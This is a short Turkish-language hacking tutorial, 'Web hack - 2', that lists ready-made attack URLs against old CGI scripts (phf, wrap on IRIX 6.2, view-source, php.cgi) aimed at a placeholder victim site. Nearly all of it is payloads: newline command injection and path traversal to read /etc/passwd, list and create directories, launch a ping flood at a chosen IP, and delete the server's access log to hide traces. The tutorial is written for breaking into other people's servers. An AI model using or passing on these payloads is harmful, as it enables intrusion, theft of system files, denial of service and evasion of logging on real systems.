Web hack - 2

A- (Phf scripti): Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd

Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makinaları üzerinde denemekte yarar var.

B- (Wrap Scripti): Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da şöyle istismar edebiliriz:

http://www.kıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd

http://www.kıracağımızadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var.

C- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var)

http://www.kıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd ya da

http://www.kıracağımızadres.com.tr/cgi-bin/view-source?%1b or %0a %20

D- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd

E- Diğer Denenebilir Scriptler:

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s %205000%20ip%20to%20shoot

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

Dikkat: Tüm Http girişleri ana bilgisayarlarda günlük şeklinde tutulmaktadır. Bu yüzden güvenliği çok yüksek ve sizin başınıza bela açacağınızı düşündüğünüz sitelere bu yöntemle erişmeyi kesinlikle düşünmeyin !